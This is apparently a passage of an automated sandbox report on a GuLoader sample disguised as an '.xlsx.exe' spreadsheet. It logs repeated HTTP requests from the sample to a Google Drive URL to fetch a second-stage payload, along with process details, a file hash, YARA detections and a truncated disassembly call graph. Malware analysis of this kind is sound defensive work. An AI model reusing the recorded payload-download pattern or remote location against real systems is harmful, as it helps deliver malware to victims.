                                                        2024-12-16 16:59:12 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 37 58 72 2d 50 67 67 33 35 65 2d 2d 48 61 64 6d 77 46 49 5a 50 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="7Xr-Pgg35e--HadmwFIZPg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        34192.168.2.849841172.217.19.174443928C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:59:14 UTC417OUTGET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:59:15 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:59:15 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-L_DBuh_sdhFihDW1uRprow' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        35192.168.2.849849142.250.181.1443928C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:59:17 UTC459OUTGET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:59:18 UTC1844INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC4qPwmxkdT5dJy6YRHHg3n6lMNkesTwzBPhCD3RAsjeoCdrQcX4Ybh3vK09gLjSrtOT
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:59:17 GMT
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy: script-src 'nonce-_rMKfn0T2OhGkyRljhcTXg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:59:18 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 42 73 6e 32 77 75 2d 68 58 75 37 34 72 2d 65 66 7a 44 67 5f 4b 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Bsn2wu-hXu74r-efzDg_KQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        36192.168.2.849856172.217.19.174443928C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:59:20 UTC417OUTGET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:59:21 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:59:20 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: script-src 'nonce-mqZS1wnNCl-JrgT09RcU5A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        37192.168.2.849863142.250.181.1443928C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:59:22 UTC459OUTGET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:59:23 UTC1844INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC6GhEO2Ai7sCU3mZfLPhYZMc-mWA1OS5TP9sBmXECW-Eq4KJtAWLFA_ioIH1eOq8vOB
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:59:23 GMT
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-QhHo2obnTG8bAW07l18oUw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:59:23 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 72 57 35 79 6f 7a 6f 71 65 6b 5f 4c 74 31 34 59 6e 45 56 4d 65 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="rW5yozoqek_Lt14YnEVMeA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:11:57:17
                                                        Start date:16/12/2024
                                                        Path:C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"
                                                        Imagebase:0x400000
                                                        File size:530'598 bytes
                                                        MD5 hash:321A9608E5BF03BF63F4574D0DF1A380
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1600421494.0000000007ED3000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:2
                                                        Start time:11:57:27
                                                        Start date:16/12/2024
                                                        Path:C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"
                                                        Imagebase:0x400000
                                                        File size:530'598 bytes
                                                        MD5 hash:321A9608E5BF03BF63F4574D0DF1A380
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2751336924.0000000004A43000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:false

                                                        Disassembly

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:20%
                                                          Dynamic/Decrypted Code Coverage:13.7%
                                                          Signature Coverage:19%
                                                          Total number of Nodes:1513
                                                          Total number of Limit Nodes:40
                                                          execution_graph 4921 401d41 GetDC GetDeviceCaps 4922 402b1d 18 API calls 4921->4922 4923 401d5f MulDiv ReleaseDC 4922->4923 4924 402b1d 18 API calls 4923->4924 4925 401d7e 4924->4925 4926 405f6a 18 API calls 4925->4926 4927 401db7 CreateFontIndirectW 4926->4927 4928 4024e8 4927->4928 3994 403cc2 3995 403e15 3994->3995 3996 403cda 3994->3996 3997 403e26 GetDlgItem GetDlgItem 3995->3997 4006 403e66 3995->4006 3996->3995 3998 403ce6 3996->3998 3999 40419a 19 API calls 3997->3999 4001 403cf1 SetWindowPos 3998->4001 4002 403d04 3998->4002 4005 403e50 SetClassLongW 3999->4005 4000 403ec0 4012 403e10 4000->4012 4064 4041e6 4000->4064 4001->4002 4003 403d21 4002->4003 4004 403d09 ShowWindow 4002->4004 4008 403d43 4003->4008 4009 403d29 DestroyWindow 4003->4009 4004->4003 4010 40140b 2 API calls 4005->4010 4006->4000 4011 401389 2 API calls 4006->4011 4014 403d48 SetWindowLongW 4008->4014 4015 403d59 4008->4015 4013 404123 4009->4013 4010->4006 4016 403e98 4011->4016 4013->4012 4022 404154 ShowWindow 4013->4022 4014->4012 4019 403e02 4015->4019 4020 403d65 GetDlgItem 4015->4020 4016->4000 4021 403e9c SendMessageW 4016->4021 4017 40140b 2 API calls 4035 403ed2 4017->4035 4018 404125 DestroyWindow EndDialog 4018->4013 4083 404201 4019->4083 4023 403d95 4020->4023 4024 403d78 SendMessageW IsWindowEnabled 4020->4024 4021->4012 4022->4012 4027 403da2 4023->4027 4030 403de9 SendMessageW 4023->4030 4031 403db5 4023->4031 4038 403d9a 4023->4038 4024->4012 4024->4023 4026 405f6a 18 API calls 4026->4035 4027->4030 4027->4038 4029 40419a 19 API calls 4029->4035 4030->4019 4032 403dd2 4031->4032 4033 403dbd 4031->4033 4037 40140b 2 API calls 4032->4037 4077 40140b 4033->4077 4034 403dd0 4034->4019 4035->4012 4035->4017 4035->4018 4035->4026 4035->4029 4055 404065 DestroyWindow 4035->4055 4067 40419a 4035->4067 4039 403dd9 4037->4039 4080 404173 4038->4080 4039->4019 4039->4038 4041 403f4d GetDlgItem 4042 403f62 4041->4042 4043 403f6a ShowWindow KiUserCallbackDispatcher 4041->4043 4042->4043 4070 4041bc KiUserCallbackDispatcher 4043->4070 4045 403f94 EnableWindow 4048 403fa8 4045->4048 4046 403fad GetSystemMenu EnableMenuItem SendMessageW 4047 403fdd SendMessageW 4046->4047 4046->4048 4047->4048 4048->4046 4071 4041cf SendMessageW 4048->4071 4072 405f48 lstrcpynW 4048->4072 4051 40400b lstrlenW 4052 405f6a 18 API calls 4051->4052 4053 404021 SetWindowTextW 4052->4053 4073 401389 4053->4073 4055->4013 4056 40407f CreateDialogParamW 4055->4056 4056->4013 4057 4040b2 4056->4057 4058 40419a 19 API calls 4057->4058 4059 4040bd GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4058->4059 4060 401389 2 API calls 4059->4060 4061 404103 4060->4061 4061->4012 4062 40410b ShowWindow 4061->4062 4063 4041e6 SendMessageW 4062->4063 4063->4013 4065 4041fe 4064->4065 4066 4041ef SendMessageW 4064->4066 4065->4035 4066->4065 4068 405f6a 18 API calls 4067->4068 4069 4041a5 SetDlgItemTextW 4068->4069 4069->4041 4070->4045 4071->4048 4072->4051 4075 401390 4073->4075 4074 4013fe 4074->4035 4075->4074 4076 4013cb MulDiv SendMessageW 4075->4076 4076->4075 4078 401389 2 API calls 4077->4078 4079 401420 4078->4079 4079->4038 4081 404180 SendMessageW 4080->4081 4082 40417a 4080->4082 4081->4034 4082->4081 4084 404219 GetWindowLongW 4083->4084 4094 4042a2 4083->4094 4085 40422a 4084->4085 4084->4094 4086 404239 GetSysColor 4085->4086 4087 40423c 4085->4087 4086->4087 4088 404242 SetTextColor 4087->4088 4089 40424c SetBkMode 4087->4089 4088->4089 4090 404264 GetSysColor 4089->4090 4091 40426a 4089->4091 4090->4091 4092 404271 SetBkColor 4091->4092 4093 40427b 4091->4093 4092->4093 4093->4094 4095 404295 CreateBrushIndirect 4093->4095 4096 40428e DeleteObject 4093->4096 4094->4012 4095->4094 4096->4095 4929 401a42 4930 402b1d 18 API calls 4929->4930 4931 401a48 4930->4931 4932 402b1d 18 API calls 4931->4932 4933 4019f0 4932->4933 4934 402746 4935 402741 4934->4935 4935->4934 4936 402756 FindNextFileW 4935->4936 4937 4027a8 4936->4937 4939 402761 4936->4939 4940 405f48 lstrcpynW 4937->4940 4940->4939 4941 401cc6 4942 402b1d 18 API calls 4941->4942 4943 401cd9 SetWindowLongW 4942->4943 4944 4029c7 4943->4944 4945 401bca 4946 402b1d 18 API calls 4945->4946 4947 401bd1 4946->4947 4948 402b1d 18 API calls 4947->4948 4949 401bdb 4948->4949 4950 402b3a 18 API calls 4949->4950 4954 401beb 4949->4954 4950->4954 4951 402b3a 18 API calls 4955 401bfb 4951->4955 4952 401c06 4956 402b1d 18 API calls 4952->4956 4953 401c4a 4957 402b3a 18 API calls 4953->4957 4954->4951 4954->4955 4955->4952 4955->4953 4958 401c0b 4956->4958 4959 401c4f 4957->4959 4960 402b1d 18 API calls 4958->4960 4961 402b3a 18 API calls 4959->4961 4962 401c14 4960->4962 4963 401c58 FindWindowExW 4961->4963 4964 401c3a SendMessageW 4962->4964 4965 401c1c SendMessageTimeoutW 4962->4965 4966 401c7a 4963->4966 4964->4966 4965->4966 4262 4014cb 4263 4051f2 25 API calls 4262->4263 4264 4014d2 4263->4264 4967 40194b 4968 402b1d 18 API calls 4967->4968 4969 401952 4968->4969 4970 402b1d 18 API calls 4969->4970 4971 40195c 4970->4971 4972 402b3a 18 API calls 4971->4972 4973 401965 4972->4973 4974 401979 lstrlenW 4973->4974 4979 4019b5 4973->4979 4975 401983 4974->4975 4975->4979 4980 405f48 lstrcpynW 4975->4980 4977 40199e 4978 4019ab lstrlenW 4977->4978 4977->4979 4978->4979 4980->4977 4981 4024cc 4982 402b3a 18 API calls 4981->4982 4983 4024d3 4982->4983 4986 405bb4 GetFileAttributesW CreateFileW 4983->4986 4985 4024df 4986->4985 4987 40164d 4988 402b3a 18 API calls 4987->4988 4989 401653 4988->4989 4990 40628b 2 API calls 4989->4990 4991 401659 4990->4991 4992 4019cf 4993 402b3a 18 API calls 4992->4993 4994 4019d6 4993->4994 4995 402b3a 18 API calls 4994->4995 4996 4019df 4995->4996 4997 4019e6 lstrcmpiW 4996->4997 4998 4019f8 lstrcmpW 4996->4998 4999 4019ec 4997->4999 4998->4999 5000 401e51 5001 402b3a 18 API calls 5000->5001 5002 401e57 5001->5002 5003 4051f2 25 API calls 5002->5003 5004 401e61 5003->5004 5005 4056c3 2 API calls 5004->5005 5006 401e67 5005->5006 5007 401ec6 CloseHandle 5006->5007 5008 401e77 WaitForSingleObject 5006->5008 5010 402793 5006->5010 5007->5010 5009 401e89 5008->5009 5011 401e9b GetExitCodeProcess 5009->5011 5012 4062eb 2 API calls 5009->5012 5013 401eb8 5011->5013 5014 401ead 5011->5014 5015 401e90 WaitForSingleObject 5012->5015 5013->5007 5017 405e8f wsprintfW 5014->5017 5015->5009 5017->5013 4321 401752 4322 402b3a 18 API calls 4321->4322 4323 401759 4322->4323 4324 401781 4323->4324 4325 401779 4323->4325 4377 405f48 lstrcpynW 4324->4377 4376 405f48 lstrcpynW 4325->4376 4328 40178c 4330 405993 3 API calls 4328->4330 4329 40177f 4332 4061dc 5 API calls 4329->4332 4331 401792 lstrcatW 4330->4331 4331->4329 4339 40179e 4332->4339 4333 40628b 2 API calls 4333->4339 4334 4017da 4335 405b8f 2 API calls 4334->4335 4335->4339 4337 4017b0 CompareFileTime 4337->4339 4338 401870 4340 4051f2 25 API calls 4338->4340 4339->4333 4339->4334 4339->4337 4339->4338 4342 405f48 lstrcpynW 4339->4342 4348 405f6a 18 API calls 4339->4348 4359 401847 4339->4359 4360 405bb4 GetFileAttributesW CreateFileW 4339->4360 4378 405724 4339->4378 4343 40187a 4340->4343 4341 4051f2 25 API calls 4347 40185c 4341->4347 4342->4339 4361 403062 4343->4361 4345 4018a1 SetFileTime 4349 4018b3 CloseHandle 4345->4349 4348->4339 4349->4347 4350 4018c4 4349->4350 4351 4018c9 4350->4351 4352 4018dc 4350->4352 4354 405f6a 18 API calls 4351->4354 4353 405f6a 18 API calls 4352->4353 4356 4018e4 4353->4356 4355 4018d1 lstrcatW 4354->4355 4355->4356 4358 405724 MessageBoxIndirectW 4356->4358 4358->4347 4359->4341 4359->4347 4360->4339 4362 403072 SetFilePointer 4361->4362 4363 40308e 4361->4363 4362->4363 4382 40317d GetTickCount 4363->4382 4366 405c37 ReadFile 4367 4030ae 4366->4367 4368 40317d 43 API calls 4367->4368 4375 40188d 4367->4375 4369 4030c5 4368->4369 4370 40313f ReadFile 4369->4370 4372 4030d5 4369->4372 4369->4375 4370->4375 4373 405c37 ReadFile 4372->4373 4374 403108 WriteFile 4372->4374 4372->4375 4373->4372 4374->4372 4374->4375 4375->4345 4375->4349 4376->4329 4377->4328 4379 405739 4378->4379 4380 405785 4379->4380 4381 40574d MessageBoxIndirectW 4379->4381 4380->4339 4381->4380 4383 4032e7 4382->4383 4384 4031ac 4382->4384 4385 402d1a 33 API calls 4383->4385 4395 40330f SetFilePointer 4384->4395 4391 403095 4385->4391 4387 4031b7 SetFilePointer 4393 4031dc 4387->4393 4391->4366 4391->4375 4392 403271 WriteFile 4392->4391 4392->4393 4393->4391 4393->4392 4394 4032c8 SetFilePointer 4393->4394 4396 4032f9 4393->4396 4399 4063ee 4393->4399 4406 402d1a 4393->4406 4394->4383 4395->4387 4397 405c37 ReadFile 4396->4397 4398 40330c 4397->4398 4398->4393 4400 406413 4399->4400 4401 40641b 4399->4401 4400->4393 4401->4400 4402 4064a2 GlobalFree 4401->4402 4403 4064ab GlobalAlloc 4401->4403 4404 406522 GlobalAlloc 4401->4404 4405 406519 GlobalFree 4401->4405 4402->4403 4403->4400 4403->4401 4404->4400 4404->4401 4405->4404 4407 402d43 4406->4407 4408 402d2b 4406->4408 4409 402d53 GetTickCount 4407->4409 4410 402d4b 4407->4410 4411 402d34 DestroyWindow 4408->4411 4412 402d3b 4408->4412 4409->4412 4414 402d61 4409->4414 4421 4062eb 4410->4421 4411->4412 4412->4393 4415 402d96 CreateDialogParamW ShowWindow 4414->4415 4416 402d69 4414->4416 4415->4412 4416->4412 4425 402cfe 4416->4425 4418 402d77 wsprintfW 4419 4051f2 25 API calls 4418->4419 4420 402d94 4419->4420 4420->4412 4422 406308 PeekMessageW 4421->4422 4423 406318 4422->4423 4424 4062fe 